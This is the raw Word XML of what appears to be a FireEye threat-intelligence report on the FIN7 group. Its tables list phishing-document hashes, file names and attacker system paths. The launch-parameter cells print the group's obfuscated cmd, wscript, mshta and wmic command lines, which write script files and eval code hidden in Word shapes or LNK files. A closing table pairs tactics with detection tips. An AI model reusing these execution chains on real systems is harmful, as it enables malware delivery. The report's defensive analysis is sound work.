      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="306529D2"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B0958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cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="4FDA1273"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02259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691CE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87685E"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BBC7CD"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ECBB4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2975FA49"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02965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2017:10:25 07:43:00</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4DD21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823B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36B04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c4aabdcf19898d9c30c4c2edea0147f0</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15B2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document1.doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="279DCAB7"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0F9A43"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oleg</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\Файлы\Картинки\New\defender.jpg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="421E63B8"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76A8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cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="7D7DF048"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E46B7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lastRenderedPageBreak/>
              <w:t>EXIF Creation Time</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FBF4C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EB08E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C17B1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9C97F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01FA2903" w14:textId="77777777" w:rsidTr="009403EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="177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7804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2017:06:23 15:18:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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4D9BD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97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60585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31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2964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467062d2a5a341716c42c6d7f36ba0ed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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FFC3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check.doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="38535ECE"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0412D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Work</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\IMAGES\outlook2.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="602A9965" w14:textId="77777777" w:rsidTr="009403EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9240" w:type="dxa"/>
            <w:gridSpan w:val="7"/>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68E5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wscript.exe //b /e:jscript %TEMP%\debug.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D4BAE4D"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Table 2: Suspected FIN7 spear phishing launch parameters and attacker local system artifacts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9270" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1432"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="1056"/>
        <w:gridCol w:w="1359"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="3231"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="1546"/>
      </w:tblGrid>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="493DD9B5"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6AAE6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B20EA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E9A11E"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D6E46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05EC0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23A9AF7A"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D5E1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2017:10:06 11:21:00</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490D8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98B2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F1D8F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29a3666cee0762fcd731fa663ebc0011</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1D0DD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Doc0610.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="6AA82567"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BDAD2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andy</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\unlock.cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="264F47B5"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AFCC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cmd /c ""%TMP%\unlock.cmd" "</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="7926D0F8"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7EAFB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@set w=wsc@ript /b /e:js@cript %HOMEPATH%\tt.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>@echo try{var fs=new ActiveXObject('Scripting.FileSystemObject');sh=new ActiveXObject('Wscript.Shell');p=sh.ExpandEnvironmentStrings('%%HOM'+'EPATH%%')+'\\pp.txt';var f=fs.OpenTextFile(p,1,false);for(i=0;i^&lt;4;i++)f.SkipLine();var com='';while(!f.AtEndOfStream)com+=f.ReadLine().substr(1);f.Close();try{fs.DeleteFile(p, true);}catch(e){}this[String.fromCharCode(101)+'v'+'al'](com);}catch(e){}; &gt;%HOMEPATH%\tt.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>@copy /y %TMP%\unlock.cmd %HOMEPATH%\pp.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>@echo %w:@=%|cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="782D6F1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2BB8B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5A6A2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A6FE9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817E9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E2F06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49095F9E"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0ABC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2017:09:27 11:56:00</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E43A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AD4E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985C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6146a18570e134c6c32633aca14375fb</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181C7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Doc2709.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="08849098"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A60E70"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usr</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Documents\send\270917\unlock.doc.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="3963A226"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ABC9A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wmic.exe process call create "cmd start /min cmd /c for /f \"usebackq delims=\" %x in (`FindStr /R /C:\"@#[0-9]#@\" \"%TEMP%\unlock.doc.lnk\"`) do %x|cmd &gt;nul 2&gt;&amp;1 &amp;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="2A6CDE3D"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5052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cmd.exe /S /D /c" echo /*@#8#@*/try{sh=new ActiveXObject("Wscript.Shell");fs=new ActiveXObject("Scripting.FileSystemObject");p=sh.ExpandEnvironmentStrings("%TM"+"P%");f=fs.GetFile(p+"//unlock.doc.lnk");s=f.OpenAsTextStream(1,0);c=s.Read(2403);c=s.ReadAll();s.Close();this[String.fromCharCode(101)+'va'+'l'](c);}catch(e){} &gt;%HOMEPATH%\t.txt  &amp; wscript //b /e:jscript %HOMEPATH%\t.txt  &gt;nul 2&gt;&amp;1 &amp;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="497ACEEF"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96A0D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A5AB1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A1F178"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B94716"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E8DD33"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25D2B007"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6185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2017:08:08 17:38:00</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5542A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EA34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FCDC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03e85ad4217775906e6b5ceae8dc27af</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ABF49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Doc_n0908.rtf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="0AD3DFDE"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B7C38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andy</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\unlock.doc.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="1AE8086B"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3FFD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wmic.exe process call create "mshta javascript:eval(\"try{eval('wall=GetObject(\\'\\''+String.fromCharCode(44)+'\\'Word.Application\\')');eval(wall.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){};close();\")"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="22EF894F"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97C1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mshta.exe "try{jelo = 'try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+\\'va\\'+\\'l\\'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){};';var fso = new ActiveXObject("Scripting.FileSystemObject");var sh = new ActiveXObject("Wscript.Shell");var p = sh.ExpandEnvironmentStrings("%HOMEPATH%") + "\\\\jelo.txt""</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="4998E99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7370E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BEC8D3"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2B130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84EAB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2DA17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24D63CA1"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45192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2017:07:27 15:51:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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E286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35"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4E78B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32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7B23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63e2eb258a85ed4e72f951cdbff2a58e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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10F0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Dooq.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="49E9E017"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E0A36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jinvr-3-1</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\unlock.doc.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="2EE404DB"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46B0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cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\ttt.txt &amp; echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){}; &gt;%HOMEPATH%\ttt.txt &amp; echo %x:@=%|cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="41C6D5C3"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9B003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649386"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7C6F9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D1F3F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89D54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2BDC0410"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0367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2017:06:28 16:21:00</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ADC09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C1A7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564D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22ad7c05128ca7b48b0a2a4507803b16</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EA26B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Doc0507.rtf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="0A1F48FD"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949B8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andy</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\unprotect.rtf.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="40175492"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3FB5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cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\md5.txt &amp; echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){}; &gt;%HOMEPATH%\md5.txt &amp; echo %x:@=%|cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="462789F3"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14465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DC827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86659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F49246"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9C4C4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66235098"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E40B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2017:05:11 12:59:00</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A051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56EB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r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>BEACON</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9D80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99975b5ee2ddd31e89c9bdda7a3871d9</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476C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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="398A3D42"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D7D16D"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user</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Documents\unprotect.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="0E4F9CCC"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5CCDC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C:\WINDOWS\system32\mshta.exe vbscript:Execute("On Error Resume Next:set yjdsqjtrn=GetObject(,""Word.Application""):execute yjdsqjtrn.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="12D5FF3D"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3EEC7E"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0361F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D1D91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81D5BD"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F1AF1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53D9E675"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AD756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2017:04:20 16:27:00</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7D59F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F03982"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r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>BEACON</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DB0A9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42a2a2352f6b1f5818f3b695f240fc3a</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321EF2"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info.rtf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="453A4129"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6AE75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testadmin.TEST</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\unprotect.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="1DCB14FD"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E29716"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C:\WINDOWS\system32\mshta.exe vbscript:Execute(&amp;quot;On Error Resume Next:set wprotect=GetObject(,&amp;quot;&amp;quot;Word.Application&amp;quot;&amp;quot;):execute wprotect.ActiveDocument.Shapes(1).TextFrame.TextRange.Text:close&amp;quot;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="04CA1699"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F0FA4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BDB9B3"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89EE4E"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87FDD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22740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271E04FF"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D1AE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2017:01:12 18:00:00</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147A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9910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r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>BEACON</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>BELLHOP</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1D57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cea2989309ccd5128f437335622978f1</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C023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order.rtf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="67164D1A"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B25FE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C:\Users\</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>testadmin.TEST</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\unprotected.vbe</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>C:\Users\</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>tst01</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\unprotected.vbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="493E3F08"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98C8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%WINDIR%\System32\Wscript.exe %TEMP%\WindowsUpdate_X24532\beginer.vbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="0593966B"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05003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EXIF Creation Time</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E6A79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B8CCE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9ACEC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FAAB8A"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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="07A22E52" w14:textId="77777777" w:rsidTr="009403EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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FE2CB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2016:08:12 11:26:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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0611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13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DBC9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3285" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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D3E2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fbf653b89a0814f515ddbdcf82cc3795</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195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A583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Reservation - Copy.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="36C85512"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D7BF0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C:\Users\</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>test</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Documents\sploits\120816\order.vbe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="144CEBA3" w14:textId="77777777" w:rsidTr="009403EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9270" w:type="dxa"/>
            <w:gridSpan w:val="8"/>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7472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%WINDIR%\System32\Wscript.exe %TEMP%\AdobeUpdateManagementTool.vbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65F88409"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Table 3: FIN7 spear phishing launch parameters and attacker local system artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE337A" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195"/>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FIN7 Tactics, Techniques &amp; Procedures (TTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12397982"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FireEye is providing insight into FIN7’s notable methodologies across multiple stages of the attack lifecycle and tips for identifying evidence of this activity and similarly suspicious activity in your environment.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2198"/>
        <w:gridCol w:w="2251"/>
        <w:gridCol w:w="4911"/>
      </w:tblGrid>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="4E7FD97D"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F72DD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Attack Lifecycle Stage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A5909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Adversary Methodology</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A9507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Discovery Tips</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="4A7ED7CA"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C77378"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Initial Compromise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A57B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Spear phishing emails sent using PHP Mailer</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6D19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Inbound emails containing metadata such as “X-Mailer: PHPMailer”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="71A09A24"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294755"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Establish Foothold</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A277B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Persistence using registry Run and Run Once keys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D8BB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New Run and RunOnce registry entries referencing .VBS and .VBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="5D87DAE6"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464992"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Establish Foothold</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812E7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Execution or persistence using Scheduled Tasks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E18A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New Scheduled Tasks referencing .CMD, .LNK, .VBS, .VBA, .PS1 and other scripting language extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="48BC4196"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E5940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Establish Foothold</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6CAE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Persistence using Windows Services, Startup Directory</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751BE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New Windows Services, new files in Startup directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="6268149E"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2CFB12"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Establish Foothold</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A8CA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Persistence using AppCompat Shim</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768F66"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New shim database files and modifications of AppCompatFlags registry keys (see </w:t>
            </w:r>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidRPr="009403EE">
                <w:rPr>
                  <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                  <w:color w:val="2E5799"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>FIN7 SDB Persistence</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="0E8F0476"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EBE610"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lastRenderedPageBreak/>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E5C6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using favored C2 ports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FE3D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Outbound connections with port-protocol mismatches on common ports such as 53,80,443,8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="640C563F"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AAD47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A5E2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using favored generic 3LDs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FD78B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Outbound connections or DNS resolutions to "sketchy" 2</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>nd</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> level domains with generic 3</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>rd</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> level domains such as mail, www1, www2, dns, ftp (eg. “mail[.]qefg[.]info”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
